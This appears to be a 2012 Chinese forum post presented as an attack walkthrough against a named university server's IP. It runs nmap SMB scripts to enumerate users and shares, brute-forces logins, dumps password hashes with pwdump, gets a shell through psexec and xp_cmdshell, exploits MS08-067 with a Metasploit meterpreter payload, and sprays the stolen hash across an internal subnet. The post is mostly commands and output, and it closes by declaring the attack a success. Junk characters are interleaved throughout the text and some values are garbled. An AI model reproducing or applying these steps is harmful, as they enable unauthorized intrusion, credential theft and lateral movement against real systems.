广西师范网站http://202.103.242.241/
5 u* `/ i9 j! Y! n. u7 ~9 O$ z) j" ~# a& m/ w, r9 C2 ^
root@bt:~# nmap -sS -sV 202.103.242.241' F2 E3 \. l" P3 h
, M! }# x$ `/ h! X$ T$ o+ r$ ZStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST8 [; s7 F) T! @7 \- U0 K
/ h% i* e3 Y; z* y0 O
Nmap scan report for bogon (202.103.242.241); B: n8 X/ z t. [/ B, M1 k4 S: `4 O
5 a+ `+ S- Q* c1 f( i
Host is up (0.00048s latency).6 m/ a# q# T. G" W
" m6 x3 I7 ]7 E0 Z- w- M; @ o
Not shown: 993 closed ports8 u2 | j+ X3 c& A" N
9 u' m2 D* V* W4 q! h: h; g/ MPORT STATE SERVICE VERSION
: n$ m, X; j0 ~+ s( R2 u! }
) Z4 _3 x+ x- h+ o2 _. S$ Z$ t135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)3 H" t/ M! L" }7 h2 }' H
5 T. O4 y* @7 L; j5 f139/tcp open netbios-ssn
: Q3 u5 b2 j6 J' r) z0 v% G* v5 Y" l2 \
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds$ Z; F1 S# P& c$ Z
0 e4 F' |; i) T7 ]1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
' N% F4 w* {9 C8 b2 |8 |( W0 a3 c% |, X! V* N/ b
1026/tcp open msrpc Microsoft Windows RPC* f4 y5 x$ E0 Q: C8 q
' i3 ^/ ^, r) n3 X% Y* M, D' r# o5 ?
3372/tcp open msdtc?9 H0 L8 F5 K9 T0 P
6 D6 D7 `0 B, ?' @1 j0 X6 N! S3389/tcp open ms-term-serv?
! U. T. e: X Z9 |& S0 f- ^( E" t- m7 c( [9 C% ]/ O' F9 ^+ E4 ?" {! P9 I* P! T# `
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :' N- E. W* T1 t" i
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
! v! v4 S6 \3 o2 l7 G, i" Q+ D0 ^& r1 Y- ]' Q
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
0 K. h! p& U) E. v3 R5 B
' W8 G% B6 |- |0 [6 n8 W) X( \* Y- xSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
( G$ R% @3 H! g9 D5 V" P a4 @# a6 |# l2 m+ e' r5 q/ y2 Q
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
6 {! _# U% a3 V
3 d- i( r7 S6 `) }7 H5 pSF:ptions,6,”hO\n\x000Z”);
* \2 f* Y# I# t. `
) ^% `- a! ], z7 I( x: J$ U1 bMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
. U i1 X) r& \, O- @ W8 v+ S K3 ?3 `! k
Service Info: OS: Windows. k6 z! M' J1 d% n
: A. g. F G1 j. o* s8 |2 ~
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .4 g- z# A0 q; ?& \9 {3 w" g
) T6 k; `, N1 @9 D, F6 CNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
2 Y3 u& N+ D0 A I0 A+ C5 d. }& R# X5 P
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
1 k; K& E7 V' a
# {' u; \ T% G8 h-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
; F0 V" i* g0 \
4 a/ |2 b/ O4 M' k" Z! B! F: K-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
* @' R, ^" o% N4 u# z2 `: K- a& F/ `2 a) w) U7 N3 n+ S: D
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse( G% U$ S1 }, w( Y5 V0 T2 ?1 O
6 J9 a5 @% z3 b; n& G( G# q* L* G
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse* R9 _( t4 @3 }( b# w* u
/ ~; E8 v! r' `/ V-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
: J% P( a4 W4 x! A# r# _: X" W
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
& O$ V( b$ M+ C8 y
$ t! `& A' U1 ~-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
5 F2 h9 d( t& e
' r" u& E( `+ A! X9 h& R+ ^! G* G-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse q3 f' U6 x* R0 s' y; N& V
* t9 s# e8 e9 l% I-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
# |" i3 \+ s8 ~' F4 p( y' `. A8 @ c9 Z z
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
$ p* x8 _) ?3 ~7 p+ X2 X, @5 l n7 r6 c% D6 C6 h
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse2 g7 d6 Q' U$ c' M2 M& h+ S# E8 H
0 J7 T, N7 d6 {3 h4 H2 o
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
: y' { e. y' I, p# j3 L$ X; a" b( l; y( K$ o8 s" h
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
& g9 u/ X& e. h( f
3 f& p9 {4 L f& n7 O: k6 u R ~-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse: g0 X% H. s, I S
! |7 G7 ~7 F) _# H-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse+ w6 K# I9 t. m
X: y" j1 h1 Oroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
; a6 }# x" I2 q& r3 l8 n) {6 v1 z& ~& `" L: |4 z
//此乃使用脚本扫描远程机器所存在的账户名
+ g# v' j: |8 [9 B9 U: q; d) V/ Z% x7 Z% p, a" m2 L
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
2 x5 k- s/ m% j; p m; B# C3 }3 h4 _6 p' O* z E1 [
Nmap scan report for bogon (202.103.242.241)# u+ ]# v+ _5 P3 g2 p
. i/ }" D& G0 l! e
Host is up (0.00038s latency).( S) \" `7 |: Y( k9 w- v
7 `+ D @# }' t* O" ENot shown: 993 closed ports
0 X% {. g t( ^" x3 E
- G- S8 o" ~2 J3 E! j7 OPORT STATE SERVICE' B- ?- H T. S
+ g! O; }( H4 X2 O6 q4 o
135/tcp open msrpc0 w- e, S0 h* t- v# p% b% K5 j
3 U- Y+ f t4 Y& ^- U
139/tcp open netbios-ssn
3 Y2 b2 q" T/ k6 l) y
" z) Q/ F2 `7 l* h: U445/tcp open microsoft-ds. R$ k' F$ u; }% G" A: d
6 ~' T5 I6 x' E7 l
1025/tcp open NFS-or-IIS/ i9 [9 A6 T) M
, n9 ^8 \, G) ?* R# n1026/tcp open LSA-or-nterm: [+ ?( R# B# Y
8 M% G+ I9 T8 N3372/tcp open msdtc
, b7 \) F# [1 U) M: h1 @, t% ^8 Z+ t
( O$ ?$ K2 n' a0 ?) f3389/tcp open ms-term-serv, C* | ?% D$ Z. e+ ^( J" P
7 m5 F0 @0 z: r1 o
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
, W( C! h' R( r
/ D4 B$ _. Q2 x& c; m. PHost script results:
9 ?/ K4 m5 M! B! C- ^$ C Q9 Z+ V, @# L* f9 G) G7 i! U( m
| smb-enum-users:: T: L& l# z. Z6 e+ H+ G) R% o
5 h, f1 ^4 X1 f. M|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
+ z5 ^; R1 ~6 p, m" N( S
x; l# A0 y) p& lNmap done: 1 IP address (1 host up) scanned in 1.09 seconds
. ]$ [% _; V" _$ A5 L" W0 O4 n3 w% ?! m. e/ U
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 I4 s6 _: i' ]6 Q3 H: g
" y- q" o2 W/ u6 ^//查看共享
/ d6 z4 [ \! b) z0 V6 h. a1 T" R4 L, l3 I
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
& ^" d. y; T' n9 x" ^, M& y2 E( x+ K: H/ H
Nmap scan report for bogon (202.103.242.241)9 L# f; P3 f! b- O+ ~) s4 C% M. T$ C
* o7 X. J. o0 ]
Host is up (0.00035s latency).! q1 ^/ l; d+ {4 @
# c9 S p( a: E% U% x
Not shown: 993 closed ports. h# o7 Q" _0 ^8 f; ? K
7 I% d+ ~- @' o# z Y3 c2 Y
PORT STATE SERVICE
6 |$ o/ P: K# d5 j% ], M
! N( \) Y! M2 K" Z7 a5 D- W0 O135/tcp open msrpc. }- y* ^, n _6 W8 m8 D
, w: y; [6 O, b1 p$ y
139/tcp open netbios-ssn; Z0 A+ F- P0 n5 A# J! f7 C0 d! Y
: K" I( {$ h% N b' c2 ]3 Y
445/tcp open microsoft-ds6 l+ X& v. w& K( k+ T Z+ `9 z% u
. E) u" M0 Z R, ~$ G$ Q
1025/tcp open NFS-or-IIS7 W$ t, j5 a0 @1 M( l2 F
* u& J; w0 q% }! @- _3 f( V+ }4 g
1026/tcp open LSA-or-nterm
8 C0 t1 {) b- `* {
% v, ]1 M8 q1 m5 f+ e# z9 y3372/tcp open msdtc
2 R( [# j( \3 A) y; R6 V5 O {1 R2 n7 F7 H, X# J$ n3 ?
3389/tcp open ms-term-serv
: g. }) d! h* `. |( \
2 C+ \9 C6 D6 Z% s1 x0 N' BMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)8 m6 b) {3 ^+ Z: Z" b
P- G$ f" P3 r: X; C0 q5 F: X8 zHost script results:% ?) `5 e9 W! E1 S
0 N; j9 |+ i8 T) R- L2 R7 |' q| smb-enum-shares:
& ]- x8 {5 @1 R9 |" @ c+ O$ d Q7 p) D2 h* R' w6 T# N8 i
| ADMIN$. ?6 m( t9 G! a0 Z; ~" {% _; S
) V; e+ s+ x/ h: G| Anonymous access: <none>
0 M! |5 q9 I. X( u3 t( `. R8 A5 i. K
1 p6 |$ u- l* D3 x& |5 }| C$
8 }8 y6 w" V2 V/ _5 H# b( w
6 b- k$ Q4 e) w| Anonymous access: <none>
+ @; g: R! ^# R! G% G0 Q
- f) L- Q) n2 c9 Z| IPC$) x- w" G6 r7 T% K1 X4 ^& ^2 W
3 ?# S* f o' j0 l2 P9 {+ ?
|_ Anonymous access: READ
0 W8 Z4 x- L' \8 p. n A! Z
; x( K8 s \; A* ^7 b( }. @Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
6 x9 d+ y% |$ V+ e1 k1 C$ l& L3 Y$ \% h: d& Z' R2 t" D/ A
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 - u( a7 i* ]# q( q" h& ^
- ^ }5 W9 {+ e0 F//获取用户密码
+ P% r8 t }3 q8 x' I% A( M. I& u/ e$ |. Q4 Z2 G! K$ B) _' b7 ?
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
7 s- `! g+ }7 ~" Q3 T
( B( w( u+ u) M2 x LNmap scan report for bogon (202.103.242.2418)
: P# P2 t3 K& W. r5 q$ S
7 l) X, n8 w4 `, d' q4 wHost is up (0.00041s latency).1 A( u8 j6 v6 |( D0 m! C
7 t0 \; {; }4 h/ O/ y% p, a
Not shown: 993 closed ports9 s; V) W% ]" y8 Z
" W" ^: n' X; g" YPORT STATE SERVICE
, Y6 w, v" C# L# i) A* j8 D2 u9 A7 k5 Z, O; E. ^6 i8 s
135/tcp open msrpc
6 j$ w8 ~- W" a" ?- n. {3 S8 L
139/tcp open netbios-ssn/ `6 }4 G/ ~- R, F& ^6 o! N
+ o+ Z% |6 ~, V/ w) `
445/tcp open microsoft-ds
6 {! n4 u. _* n4 x- G1 {
+ _* r/ O D9 b0 @/ n2 w1025/tcp open NFS-or-IIS
# }$ S {' B `9 F7 x$ P4 J3 x/ m5 W. _' `
1026/tcp open LSA-or-nterm
9 d t2 V- S; ?! ]
! [0 d! _+ M$ m9 G1 t8 y/ O; g3372/tcp open msdtc
3 B0 V6 T: |7 Y) E% Q, ?, d3 A) E) o* I2 I r. g" j0 v: j
3389/tcp open ms-term-serv
& k* I' {. Y6 G. G' n7 ?6 t, `7 _
3 g0 u4 Y" F3 Z" g! l4 cMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
3 v, H: E- H, f: m) D
; L* Q; M( ]( I0 |Host script results:6 U+ Z" h# l; q
4 {& C5 H' [2 ~0 }, D p| smb-brute:
+ F. E# C0 Z1 r. m, L' _2 X: f+ c( d# \+ I3 d/ O/ H# B# t$ z
administrator:<blank> => Login was successful
- y8 F9 J: W5 W* D \
; p& i* c6 u( S+ }|_ test:123456 => Login was successful8 [ M. _! f4 Z' H8 |. A/ k7 {& ~
4 ?: _1 _0 }. U7 t3 a) v0 e$ ~" fNmap done: 1 IP address (1 host up) scanned in 28.22 seconds
5 r1 |/ i: ^- p$ `, \+ z! H) |* e6 U5 {( R
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
7 D& D. J0 a, ], E8 E
' I) J* [5 | s! H8 \" vroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data w. b& m$ w1 _7 H0 Q( Z4 B, ]
4 T& K# C' L" r4 droot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse" _9 O c2 v# Q+ V
: a4 R% q$ D, o/ L: U Uroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1394 f2 H; s4 L1 s0 ~2 T( d# Z/ Y! n
/ Y4 ?0 I: E* U/ T" v0 fStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
- D$ W4 m8 `3 [/ A* q$ E
* M; N& Q2 H0 Q, A% kNmap scan report for bogon (202.103.242.241)
4 Q8 G8 i9 \/ \6 y2 |9 V' H& N7 f' h/ W) d" M9 e. Y( D
Host is up (0.0012s latency).
1 c/ ]4 I: n+ h' g; l9 j
% x! ?4 u/ b2 I1 @% {, s" kPORT STATE SERVICE) Y9 B1 [3 i, g* l5 g
/ E4 r* k! ~5 \
135/tcp open msrpc/ d2 ~ Y3 c: Z' G
8 |8 s9 M1 J$ L# Z- C139/tcp open netbios-ssn
: d( y9 S* _+ h8 v# i5 i* D& H, V! [4 J/ y) j. v0 w
445/tcp open microsoft-ds/ F, i5 ]+ V" |! q2 t' N
, T8 r, ]6 J5 t6 Z+ h1 s; Z+ }! N' JMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
. @/ D4 a, b7 G: j' ?8 J( M# |$ l- U& f; ^) m7 u
Host script results:
! z1 C. Y: B# R
5 P) `4 c, p* `! z t: u| smb-pwdump:
- G* D# C5 H& M- h8 t
3 T1 P/ a) H) P2 [; R3 @| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
* P1 U/ j. _, W8 I3 F% N# p( A( m* c3 |$ C- B
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************" w5 @6 p# a! p. v9 A# D
1 _1 O$ B6 n' k1 h% y( ~ ]# {| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D43 p- ?$ J4 n! N( A
) f0 e% A! J5 D4 i|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
7 w6 G! l. Y) ` ^4 d. x( m$ z# x
. ?! M0 C, a8 f' E' E+ p$ ONmap done: 1 IP address (1 host up) scanned in 1.85 seconds/ R* g6 E6 O4 z# W' C0 R
5 r) ?0 N4 N' f T6 eC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
# Q- e z( K9 s6 d( D
" m, c- r" Q1 N6 p-p 123456 -e cmd.exe5 K' c; x# D; z: f: V9 W
/ v5 N/ p' M9 k% ^& v a7 |PsExec v1.55 – Execute processes remotely
6 s q- G! _' _- N0 V) L4 ~
1 G+ \2 g! v: v+ j1 `Copyright (C) 2001-2004 Mark Russinovich
& G0 i" S' d, T, d* a" o$ Z$ Z4 K9 a: L# U+ B: H
Sysinternals – www.sysinternals.com7 k9 O. j2 l- |: q* r
( y/ ^3 `* f0 a, ?5 i6 H1 r3 QMicrosoft Windows 2000 [Version 5.00.2195]
" u; C, ]" v- h9 j6 f' e# P
4 R$ _" C* \ |0 D) Z: E(C) 版权所有 1985-2000 Microsoft Corp.% h( p) R2 |0 i) D
y8 _" V% q' M) H! Y6 e& n4 g
C:\WINNT\system32>ipconfig# {4 Z: T$ h% `' d# a: d# A" r+ L1 g
, C9 K! t. t6 t& jWindows 2000 IP Configuration3 L1 Z2 U7 P1 f6 \! y6 X. q. J z
) w" i0 H" T3 I, r8 F j! LEthernet adapter 本地连接:& z8 W, {" t/ ^
0 K% \" x: {/ j+ v/ u
Connection-specific DNS Suffix . :) E; s5 I* ^7 _" q
3 N, z( r) g5 R( I' b5 eIP Address. . . . . . . . . . . . : 202.103.242.241
$ k) M7 C3 k7 c! G+ E
7 R/ g" K1 c h& a$ [Subnet Mask . . . . . . . . . . . : 255.255.255.01 h/ f* q1 t7 \, d9 S, z d1 j9 m1 z% Z
' Y" e3 V9 Y8 }: u' m) J2 F
Default Gateway . . . . . . . . . : 202.103.1.1) o" L/ M+ s! C5 T# `! q7 a8 a2 l/ K& I
8 h7 z: X5 W9 a7 AC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令2 {. _4 z) Q7 H6 Q, {
- v3 K, O5 T1 q" m& Z) ~
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞* ]. ^7 |9 A5 G" V4 Q$ l
* v. k0 N$ Y9 R* s# t+ Q% I) HStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST' S& n f- x4 m
T& r5 X) C& L
Nmap scan report for bogon (202.103.242.241)
+ w: ^/ E* U. D& X% [8 k: i
; o( d# o' n2 Y% o. t5 DHost is up (0.00046s latency).$ a4 i8 T: `8 S2 `3 I2 C
0 {% U* x! M! c2 ~& P$ ]
Not shown: 993 closed ports# t6 K" M2 P% Z( C: S# W! H4 H w9 K
% G- h# {1 ?" P
PORT STATE SERVICE$ ?! Z2 ?- U& u
1 g8 {- N, x7 L
135/tcp open msrpc$ Z$ }. `2 H$ Y6 H' x# o6 L, \
' h, ]& j# K w! |* t
139/tcp open netbios-ssn
! H) \7 c0 t4 K# p$ C
: k4 V) _4 @# p5 f. j445/tcp open microsoft-ds! }9 h @* [; | f
) u% d, w m* U' h6 N
1025/tcp open NFS-or-IIS+ O. H7 @; J( v4 n, @
' k+ P, n8 N% y. u0 |; b1026/tcp open LSA-or-nterm( p. W- X a9 _( a4 k
1 w/ f1 Q/ C( n: i1 s+ \7 z2 I1 d
3372/tcp open msdtc0 W6 @4 t% `$ k6 s7 ^
9 P3 P, ^( }0 n# r! d/ G% l' J
3389/tcp open ms-term-serv3 V9 l& t U: @
( i4 O @$ ?4 [MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)% v( m5 g4 C- R1 r3 X4 N
/ x! R8 o2 Y' `$ E( S. H% FHost script results:
3 c& c9 V; R m$ A7 u- T3 f; {# U: |
i) G X2 p$ L/ U! m4 h4 O& A| smb-check-vulns:7 g [6 ]2 C2 C
: V+ Y" S3 |9 n) B# l|_ MS08-067: VULNERABLE
" G- }8 B4 f! X3 Y/ b, J
( f. l) m. E! n& C- SNmap done: 1 IP address (1 host up) scanned in 1.43 seconds" n9 }! h8 }* U5 e: m' t
. g7 w) f% D9 u, m8 U |root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
) R2 I! c F2 {1 r; Y6 }8 |& [- o2 s5 Q
msf > search ms08
! {8 m- s& o2 X9 W( r- i/ c
/ p7 x' I" q8 Z) m0 X* q$ y! Wmsf > use exploit/windows/smb/ms08_067_netapi4 L( M4 t- v! ?4 v) ]& ], V
7 y2 @) w- R, w
msf exploit(ms08_067_netapi) > show options
2 z( Y0 P0 w: L v d. ~0 W. T( v# O% u- M& U; X
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
: i5 n' ?+ f1 d- }
4 i# T8 _, m2 n0 Imsf exploit(ms08_067_netapi) > show payloads7 \2 T+ S' U/ ~
4 q8 y6 O) N) i0 O+ h8 h
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp+ \5 Y% s8 I" ~! q2 {
( T" C5 R# I! H$ Qmsf exploit(ms08_067_netapi) > exploit
9 u$ X- Q' Y* E" Z! e# n# @& L& V# K$ D9 v- j7 x; @, O
meterpreter >
. r5 k* Z- G( V) E5 z4 J8 L3 \( u
Background session 2? [y/N] (ctrl+z)
! L1 `" F. L% h4 N' S! t9 S- R, e1 {* \' B% K0 f
msf exploit(ms08_067_netapi) > sessions -l
' d4 l" {3 L0 l) f1 A; h: p3 ~0 t, D7 u& D K
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt* f, j5 r' q8 `" ^$ f2 l J
1 ^2 t/ t, I% _test0 Z8 W1 @2 h' c% _& U D# C, G9 H7 b
$ X8 ]4 Z5 ~) }5 ]8 K* U5 y/ i
administrator2 o- @$ d" s: R
7 ]7 @4 D, k z0 w4 \% yroot@bt:/usr/local/share/nmap/scripts# vim password.txt0 V! z& l' q# ^0 |- Q4 w
+ z% r3 E7 X8 s$ [! j- Y& q44EFCE164AB921CAAAD3B435B51404EE9 K3 T6 w% Y6 F& J( O
0 ^, v# [. u, N
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 ) e, q- V! p4 c
4 S% l# X& e9 X! ]. q //利用用户名跟获取的hash尝试对整段内网进行登录1 N( L* u4 s# r* [: K7 b# c: ]( H
& i! P) m, d; iNmap scan report for 192.168.1.1050 h- ~; U- O3 b. d
' f; a9 ^ d& I% H# fHost is up (0.00088s latency).
- n1 w% _( T* G& x# n
9 S. [+ ?. s# p8 `! {Not shown: 993 closed ports3 n7 c7 V5 D9 ^: l# B; ~
0 D3 g9 Z5 b) s5 g7 R" m1 jPORT STATE SERVICE
. y" ?. M6 o4 I3 \ M8 C1 T, @# o$ t6 B3 ]
135/tcp open msrpc) E8 w, u' `3 ^2 |7 p
0 h: y& H! L% g+ f139/tcp open netbios-ssn; S! F/ T; x% P4 n
3 \6 B: {6 |- m$ k w4 @, z; u
445/tcp open microsoft-ds9 a! e; {5 h6 Q& \; {! k) T
: W% t: B2 `! e: ^
1025/tcp open NFS-or-IIS
" o7 C. q8 g1 `8 d0 _& m: A) a2 v: W
1026/tcp open LSA-or-nterm
' k6 O( ?: {4 p f$ j
) c$ [) M, R2 T& r {" Z, Z8 L3372/tcp open msdtc. r4 d. W P' A& H
1 p2 r% _ m e7 A" G$ R
3389/tcp open ms-term-serv* ~% Y J, Z# r6 W$ y
& c, h* d8 z- u* h2 ^) A- hMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)# f; l! w. a- A* I
7 a% ?! D) d2 C9 f, tHost script results:
! r3 [. h; r# L: }- j9 p. E2 C4 r% f6 n2 J
| smb-brute:
5 L1 t& d8 v8 Q1 I8 O7 {
J7 X8 |: E( S! A( `: o! H7 z|_ administrator:<blank> => Login was successful4 I! u$ ?0 d# b q0 k
0 }. H$ n/ h7 E5 _4 k攻击成功,一个简单的msf+nmap攻击~~·
2 o( I$ K7 ~" U t/ G
. J& S7 R4 E' P4 p& g- w! N0 Q |
发表于 2012-12-4 12:46:42
收藏
支持
反对